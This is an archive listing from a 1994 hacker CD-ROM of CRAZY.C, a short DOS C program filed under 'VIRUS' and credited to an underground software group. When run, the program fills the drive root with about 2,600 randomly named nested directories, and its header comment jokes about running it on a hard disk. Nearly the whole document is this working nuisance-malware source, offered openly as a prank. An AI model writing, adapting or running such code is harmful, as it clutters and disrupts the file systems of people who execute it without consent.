home *** CD-ROM | disk | FTP | other *** search
/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / CRAZY.C < prev    next >
Text File  |  1994-07-17  |  673b  |  38 lines

  1. /* Make You Crazy !!
  2.  
  3.     Never execute this program on your HD , haha !!
  4.  
  5.  
  6.  
  7.     Programmed By Ninja Wala -- Royal Leader of Software Underground Palace
  8.  
  9.     Share your knowledge and experience with other members in SUP,
  10.     and we share ours with you.
  11.  
  12. */
  13.  
  14. #include        <stdio.h>
  15. #include        <stdlib.h>
  16. #include        <dir.h>
  17.  
  18. main()
  19. {
  20.     int i,j;
  21.     char tmp[20];
  22.     char far *ptr;
  23.  
  24.     for (i=0;i<=50;i++){
  25.         srand(rand());
  26.         ptr = itoa(rand(),tmp,10);
  27.         mkdir ( ptr );
  28.         chdir ( ptr );
  29.         for (j=0;j<=50;j++){
  30.             ptr = itoa(rand(),tmp,10);
  31.             mkdir( ptr );
  32.         }
  33.         chdir ("\\");
  34.     }
  35. }
  36. 
  37. Downloaded From P-80 International Information Systems 304-744-2253
  38.